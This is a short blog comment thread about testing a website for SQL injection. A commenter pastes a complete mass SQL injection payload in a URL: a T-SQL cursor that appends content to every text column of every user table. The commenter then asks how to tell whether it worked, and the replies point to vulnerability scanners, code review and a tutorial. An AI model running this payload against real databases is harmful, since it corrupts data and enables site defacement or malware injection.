e.g., http://www.mywebsite.com/home.php?declare ;DECLARE @T varchar(255),@C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(‘update ['+@T+'] set ['+@C+']=['+@C+']+””><!–”’)FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
so how would i know if the chnages have taken effect or some error has occured since I clicked enter and normal page opened against that URL of my website under test as if nothing had happened. Please tell me how to check if something wrong has occured or not or tell me of some tool that records and shows what’s happening at the back end
November 2nd, 2009 at 11:16 am
Hi Sandy,
There are some scanners available that will scan the website and tell you if they’ve detected any type of weakness (injection, XSS, etc…). If you search around online you should be able to find some free ones and some others that require you to purchase a license. There’s one called Acunetix that allows you to do XSS scanning for free but you must buy a license to do the other scans. The other option you have is to hire someone who has experience with testing a solution and providing detailed reports on security concerns. Typically a scan of a website isn’t enough to ensure it’s secure. (As secure as it can be) A code review should be undertaken as well as security scans.
Hope that helps – good luck.
Thanks,
Dave
December 17th, 2009 at 2:10 pm
Hi!
I created a video tutorial about SQL injection.
Take a look:
http://www.webmastervideoschool.com/blog_item.php?id=7